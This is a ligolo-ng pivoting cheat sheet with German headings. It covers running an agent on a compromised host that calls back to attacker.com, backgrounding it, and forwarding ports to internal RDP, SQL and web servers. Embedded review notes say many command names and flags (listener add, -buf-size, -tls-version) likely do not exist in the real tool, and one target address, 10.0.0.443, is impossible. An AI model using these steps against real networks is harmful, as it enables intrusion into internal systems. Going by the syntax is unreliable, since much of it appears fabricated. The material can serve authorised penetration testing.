
Ligolo-ng

Installation

Linux/macOS

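# Download latest release
# NOTE(review): upstream ships separate `proxy` and `agent` binaries; the
# archive and binary names below are as given on this page — confirm them
# against the releases page before relying on the chmod/mv steps.
version="0.4.10"
archive="ligolo-ng_${version}_Linux_x86_64.tar.gz"
wget "https://github.com/nicocha30/ligolo-ng/releases/download/v${version}/${archive}"

# Verify integrity before extracting: take the expected SHA-256 from the
# release's published checksum file, never from a third-party page.
expected_sha256="<SHA256-FROM-RELEASE-CHECKSUM-FILE>"   # placeholder, fill in
printf '%s  %s\n' "$expected_sha256" "$archive" | sha256sum -c - || exit 1

# Extract
tar -xzf "$archive"

# Make executable
chmod +x ligolo-ng

# Move to PATH
sudo mv -- ligolo-ng /usr/local/bin/

# Verify installation
ligolo-ng -h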

Windows

# Download from releases
Invoke-WebRequest -Uri "https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.10/ligolo-ng_0.4.10_Windows_x86_64.zip" -OutFile "ligolo.zip"

# Verify before extracting: compare (Get-FileHash ligolo.zip -Algorithm SHA256).Hash
# with the value in the release's published checksum file; no hash is given here.
# NOTE(review): upstream ships separate proxy and agent archives — confirm the
# archive name against the releases page.
# Extract
Expand-Archive ligolo.zip

# Or download manually from GitHub releases page
# Add to PATH if needed

Mit Docker

# Build from source
# This clones the default branch HEAD rather than a reviewed release; to
# build a known version, check out the release tag first (v0.4.10 is the
# version used in the install section).
git clone https://github.com/nicocha30/ligolo-ng.git
cd ligolo-ng
docker build -t ligolo-ng .

# Run proxy
# -p 11601:11601 publishes the agent-facing port on every host interface,
# and -selfcert means agents have no pre-shared certificate to verify
# against unless its fingerprint is distributed out of band.
docker run -it -p 11601:11601 ligolo-ng ./ligolo-ng -bind 0.0.0.0:11601 -selfcert

Architektur-Übersicht

Komponenten

┌─────────────────────┐
│  Attacker Machine   │
│   (Proxy Server)    │
│  ligolo-ng proxy    │
│  :11601 (listener)  │
└────────────┬────────┘
             │ TLS/TCP
      ┌──────┴──────┐
      │  Internet   │
      └──────┬──────┘

┌────────────▼────────────┐
│ Compromised Host        │
│ (Pivot Point)           │
│ ligolo-ng agent         │
│ Connects to proxy       │
│ Routes traffic          │
└────────────┬────────────┘

┌────────────▼────────────┐
│ Internal Network        │
│ Unreachable targets     │
│ 10.0.0.0/8              │
└─────────────────────────┘

Grundlegende Einrichtung

Proxy-Server (Attacker-Maschine)

# Generate self-signed certificate
# The key file written here is what authenticates the proxy to every agent;
# keep it readable only by the user running the proxy.
ligolo-ng -gen-cert -cert-file=cert.pem -key-file=key.pem

# Start proxy listener
# NOTE(review): the files are written with -cert-file/-key-file above but read
# with -cert/-key here — confirm both spellings against `ligolo-ng -h`.
# 0.0.0.0 accepts agent connections on every interface of this host.
ligolo-ng -bind 0.0.0.0:11601 -cert=cert.pem -key=key.pem

# Or without cert (auto-generate)
# An auto-generated certificate is unknown to agents in advance, so they can
# only trust it by skipping verification or by pinning it out of band.
ligolo-ng -bind 0.0.0.0:11601 -selfcert

# With custom network interface
# Binding to a single address limits which networks can reach the control port.
ligolo-ng -bind 192.168.1.100:11601 -selfcert

# Specify log level
# The troubleshooting section uses the same flag as "verbose logging"; keep
# the output, it is the record of which agents connected and when.
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4

Agent (Kompromittierte Maschine)

# Connect to proxy
# -tunnel-allow-insecure skips verification of the proxy's certificate, so a
# host on the path that can intercept 192.168.1.100:11601 could pose as the
# proxy and receive all tunnelled traffic; prefer the -ca-file form below.
# NOTE(review): flag names are as given on this page — confirm with `-h`.
ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure

# With certificate verification
# ca.pem must contain the CA (or the self-signed certificate) that issued the
# proxy's certificate; if the client checks names, as Go's TLS stack does by
# default, that certificate presumably also has to name 192.168.1.100 — confirm.
ligolo-ng -connect 192.168.1.100:11601 -ca-file=ca.pem

# Background execution
# nohup writes output to ./nohup.out when stdout is a terminal; that file and
# the running process are visible to anyone reviewing the host.
nohup ligolo-ng -connect 192.168.1.100:11601 -tunnel-allow-insecure &

# Windows background execution
START /B ligolo-ng.exe -connect 192.168.1.100:11601 -tunnel-allow-insecure

Listener-Verwaltung

Listener erstellen

# Interactive mode - add listener
# In ligolo-ng CLI:
# Each line opens --bind locally and forwards accepted connections to --to
# inside the pivoted network. A 0.0.0.0 bind exposes the internal service to
# everything that can reach the binding host; 127.0.0.1 keeps it local (as
# in the 5432 example).
# NOTE(review): the direction assumed here (listen on the proxy host, forward
# into the pivot network) is what this page implies; in upstream ligolo-ng the
# listener_add command, as I recall, opens the port on the agent host and
# forwards toward the proxy side — confirm with `help` before relying on it.
listener add --bind 0.0.0.0:3389 --to 10.0.0.5:3389
listener add --bind 0.0.0.0:80 --to 10.0.0.10:80
listener add --bind 127.0.0.1:5432 --to 10.0.0.20:5432

# Multiple listeners
# Distinct local ports (8080-8082) map to the same remote port on three hosts.
listener add --bind 0.0.0.0:8080 --to 10.0.0.1:8080
listener add --bind 0.0.0.0:8081 --to 10.0.0.2:8080
listener add --bind 0.0.0.0:8082 --to 10.0.0.3:8080

Listener-Befehle

# List active listeners
listener list

# Remove listener
# --id is presumably the index reported by `listener list`; removing the
# entry closes the exposed port.
listener remove --id=0

# View listener details
listener show --id=0

# Enable/disable listener
# Disabling keeps the mapping but stops accepting connections — a way to close
# an exposure temporarily without losing the configuration.
listener set --id=0 --enabled=false
listener set --id=0 --enabled=true

Tunnel-Schnittstellen-Verwaltung

Netzwerkschnittstellen-Konfiguration

# List tunnel interfaces
interface list

# Create virtual interface (Linux)
# 10.0.0.1/24 becomes this host's address on the tunnel; choose a range that
# does not overlap networks the host already reaches.
interface add --name=tun0 --address=10.0.0.1/24

# Add interface to active tunnel
# --id presumably refers to the agent session listed by `agent list` — confirm.
interface attach --id=0 --name=tun0

# View interface routing table
interface show --id=0

# Delete interface
# Removing the interface presumably drops every route that used it as well.
interface delete --id=0 --name=tun0

Routing-Konfiguration

# Add static route through tunnel
# Only 10.0.0.0/8 destinations go via the pivot; everything else keeps its
# normal path.
interface route add --id=0 --network=10.0.0.0/8 --via=10.0.0.1

# View routes
interface route list --id=0

# Remove route
interface route delete --id=0 --network=10.0.0.0/8

# Default gateway through tunnel
# 0.0.0.0/0 sends all of this host's traffic through the pivot. Unless a more
# specific route excludes it, that can include the proxy<->agent connection
# itself and any outbound traffic that should not transit the compromised host.
interface route add --id=0 --network=0.0.0.0/0 --via=10.0.0.1

Praktische Tunneling-Szenarien

Szenario 1: RDP-Zugriff auf internen Server

# On attacker machine, start proxy
ligolo-ng -bind 0.0.0.0:11601 -selfcert

# On compromised machine, connect agent
# -tunnel-allow-insecure disables certificate checking; the -ca-file variant
# in the agent section is the verifying form.
ligolo-ng -connect attacker.com:11601 -tunnel-allow-insecure

# In proxy CLI, add RDP listener
# 0.0.0.0 exposes the internal RDP host to anyone who can reach the attacker
# machine on 3389; 127.0.0.1 would limit it to local clients.
listener add --bind 0.0.0.0:3389 --to 10.0.0.50:3389

# Connect RDP from attacker
rdesktop 127.0.0.1:3389
# /u and /p place the credentials on the command line, where other local users
# can read them from the process list and they persist in shell history.
xfreerdp /v:127.0.0.1:3389 /u:admin /p:password

# Or via mstsc.exe on Windows
mstsc.exe /v:127.0.0.1:3389

Szenario 2: Datenbankzugriff über Pivot

# Add SQL Server listener
# Bound to 127.0.0.1, so only local clients on the proxy host can use it.
listener add --bind 127.0.0.1:1433 --to 10.0.0.100:1433

# Connect via tools on attacker
# -P places the password on the command line (process list, shell history).
sqlcmd -S 127.0.0.1,1433 -U admin -P password -d database

# Or use GUI tools
# DBeaver: New Connection > SQL Server > localhost:1433

# Verify connectivity
# NOTE(review): this only probes the local listener; it presumably reports the
# port open as soon as the listener is bound, whether or not 10.0.0.100 is
# reachable — a real query is the only end-to-end check.
nmap -p 1433 127.0.0.1

Szenario 3: Webanwendungszugriff

# Setup HTTP/HTTPS listeners
listener add --bind 0.0.0.0:8080 --to 10.0.0.80:80
listener add --bind 0.0.0.0:8443 --to 10.0.0.443:443

# Access via browser or curl
curl http://127.0.0.1:8080/
# -k disables TLS verification — presumably needed because the server's
# certificate names the internal host rather than 127.0.0.1 — but it also
# accepts any certificate at all.
curl https://127.0.0.1:8443/ -k

# Burp Suite integration
# NOTE(review): the listeners forward raw TCP to a web server, not to an HTTP
# proxy, so "Upstream Proxy" is probably the wrong Burp setting; browsing to
# http://127.0.0.1:8080/ through Burp's normal proxy listener is the usual
# approach — confirm.
# Burp > Proxy > Options > Upstream Proxy
# Server: 127.0.0.1, Port: 8080

Szenario 4: Verkettetes Pivoting (Multi-Hop)

# First pivot setup
# Attacker -> Pivot1
# Pivot1 runs agent connecting to attacker

# From pivot1, discover internal network
# Add second pivot
# Exposes port 11602 and forwards it to 10.0.0.2:11601.
# NOTE(review): the page does not say where a proxy on 10.0.0.2 comes from or
# why the next agent dials 10.0.0.1 (the tun address); the chain is
# under-specified — confirm the topology before copying it.
listener add --bind 0.0.0.0:11602 --to 10.0.0.2:11601

# On internal machine, connect to pivot1
# Again without certificate verification; every hop that skips it is a point
# where tunnelled traffic could be intercepted.
ligolo-ng -connect 10.0.0.1:11602 -tunnel-allow-insecure

# Now can route through both pivots
listener add --bind 0.0.0.0:3306 --to 10.0.0.100:3306

Erweiterte Konfiguration

Interface-Routing (Linux)

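# Create tun interface for all traffic
interface add --name=tun0 --address=10.0.0.1/24

# Route specific subnet
# `route` is the legacy net-tools command; the `ip` form below is preferred.
sudo route add -net 10.0.0.0/8 gw 10.0.0.1

# Or use ip command
# NOTE(review): 10.0.0.1 is this host's own tunnel address (see interface add);
# on a point-to-point tun device a plain `dev tun0` route without `via` may be
# what is intended — confirm against the interface's actual peer setup.
sudo ip route add 10.0.0.0/8 via 10.0.0.1 dev tun0

# View routing table
sudo route -n
ip route show

# Add default route through tunnel (be careful!)
# 0.0.0.0/1 and 128.0.0.0/1 together cover the whole IPv4 space and, being
# more specific than the existing default route, take precedence without
# deleting it. Adding only the first half leaves 128.0.0.0/1 on the old path.
# This re-routes the proxy host's own traffic too, including the connection to
# the agent unless its address keeps a more specific route.
sudo ip route add 0.0.0.0/1 via 10.0.0.1 dev tun0
sudo ip route add 128.0.0.0/1 via 10.0.0.1 dev tun0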

Leistungsoptimierung

# Increase buffer sizes (in proxy config)
# NOTE(review): -buf-size, -max-conns and -tls-version are not flags I can find
# in upstream documentation; confirm each with `ligolo-ng -h` before relying
# on them.
ligolo-ng -bind 0.0.0.0:11601 -selfcert -buf-size=65536

# Set goroutines limit
ligolo-ng -bind 0.0.0.0:11601 -selfcert -max-conns=1000

# Optimize for high-bandwidth tunnels
# A minimum TLS version is a security setting rather than a performance one:
# if supported, it refuses agents that would negotiate older protocol versions.
ligolo-ng -bind 0.0.0.0:11601 -selfcert -tls-version=1.3

TLS-Konfiguration

# Using custom certificates
# server.key is the proxy's private key — restrict it to the proxy user.
# -ca presumably enables verification of agent client certificates (mutual
# TLS), which would stop unauthorised agents from registering — confirm.
ligolo-ng -bind 0.0.0.0:11601 \
  -cert=server.crt \
  -key=server.key \
  -ca=ca.crt

# Verify agent certificate
# The agent verifies the proxy with -ca-file and, given -cert-file/-key-file,
# presumably presents its own certificate. A client key copied onto a
# compromised host should be unique to that deployment so that losing it
# revokes only that agent.
ligolo-ng -connect proxy.com:11601 \
  -ca-file=ca.crt \
  -cert-file=client.crt \
  -key-file=client.key

Fehlerbehebung

Verbindungsprobleme

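# Test connectivity from agent to proxy
# On compromised machine
telnet attacker.com 11601
nc -zv attacker.com 11601

# Check firewall rules
# Linux
# -n keeps ports numeric so the match on 11601 is not defeated by service-name
# resolution in the listing.
sudo iptables -nL | grep 11601
sudo ufw status | grep 11601

# Windows
# grep is not a stock Windows tool; findstr is the built-in equivalent.
netsh advfirewall firewall show rule name=all | findstr 11601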

Routing-Probleme

# Verify routes are active
listener list
interface list

# Test connectivity to internal server
# Through listener (from attacker)
# A successful connect here only proves the local listener accepts; whether
# the remote service answers (e.g. a banner) is what confirms the forward.
telnet 127.0.0.1 3389

# Check MTU
# -M do sets the don't-fragment bit; 1472 bytes of payload plus 28 bytes of
# IPv4/ICMP headers is a full 1500-byte packet, so a failure here means the
# tunnel path needs a smaller MTU.
ping -M do -s 1472 internal.server

# Enable verbose logging
ligolo-ng -bind 0.0.0.0:11601 -selfcert -loglevel=4

Leistungsprobleme

# Monitor tunnel statistics
# In CLI: tunnel info

# Check agent health
# In CLI: agent list

# Reduce listener count if needed
# X is a placeholder for the id reported by `listener list`.
listener remove --id=X

# Monitor network
# Linux
# Both tools need root; iftop shows per-connection rates on the tunnel
# interface, nethogs attributes bandwidth to local processes.
iftop -i tun0
nethogs

Sicherheits-Best-Practices

Zertifikatverwaltung

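# Generate certificate with proper CN
# Modern TLS clients (Go's crypto/x509 included) ignore the CN for hostname
# checks and require a subjectAltName, so the name is added there as well
# (-addext needs OpenSSL 1.1.1 or newer).
# -nodes leaves the private key unencrypted; the chmod keeps it private.
openssl req -new -x509 -days 365 -nodes \
  -out cert.pem -keyout key.pem \
  -subj "/C=US/ST=State/L=City/O=Org/CN=proxy.domain.com" \
  -addext "subjectAltName=DNS:proxy.domain.com"
chmod 600 key.pem

# Verify certificate chain
# A certificate made with -x509 above is self-signed, so this only succeeds
# when ca.pem is that same certificate (or the CA that issued a real one).
openssl verify -CAfile ca.pem cert.pem

# Check certificate expiry
openssl x509 -in cert.pem -text -noout | grep "Not After"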

Netzwerk-Isolation

# Limit listener binding
listener add --bind 127.0.0.1:3389 --to 10.0.0.5:3389
# Only accessible from localhost

# Use firewall rules
# NOTE(review): on the proxy host the inbound peer on 11601 is the agent, so
# -s should name the agent's source address; `attacker_ip` is a placeholder
# and a misleading one — confirm which host these rules are meant for.
# Order matters: the ACCEPT is appended before the DROP. Rules added with -A
# are not persistent across reboot and land after any existing rules that may
# already match.
sudo iptables -A INPUT -p tcp --dport 11601 -s attacker_ip -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 11601 -j DROP

Anmeldedaten-Sicherheit

# Use authentication if available
# Check for auth mechanism in documentation
# Without agent authentication, any host that can reach 11601 and complete
# the TLS handshake can register as an agent; mutual TLS (the -ca / client
# certificate setup in the TLS section) is the mitigation.

# Disable insecure mode in production
# Instead of: -tunnel-allow-insecure
# Use proper certificate-based auth

# Monitor tunnel activity
# NOTE(review): `listener show` displays a listener's configuration; actual
# connection activity is presumably in the proxy log (-loglevel) — confirm.
listener show --id=0

CLI-Befehlsreferenz

# Listener commands
# NOTE(review): these command names are as given on this page; the upstream
# ligolo-ng CLI I am familiar with uses underscored forms (listener_add,
# listener_list, listener_stop, ifcreate, route_add, session, start) — run
# `help` in the actual build and trust its output over this list.
# <BIND> is the local address:port exposed, <TARGET> the address:port reached
# through the pivot.
listener add --bind <BIND> --to <TARGET>
listener remove --id=<ID>
listener list
listener show --id=<ID>

# Interface commands
# <ADDR/MASK> is the tunnel address in CIDR form (e.g. 10.0.0.1/24 above).
interface add --name=<NAME> --address=<ADDR/MASK>
interface list
interface attach --id=<ID> --name=<NAME>
interface delete --id=<ID> --name=<NAME>
interface route add --id=<ID> --network=<NET> --via=<GW>
interface route list --id=<ID>

# Agent commands
# `agent close` ends a session; the listeners and routes attached to it are
# presumably torn down with it — confirm.
agent list
agent info --id=<ID>
agent close --id=<ID>

# General
help
exit

Referenzen

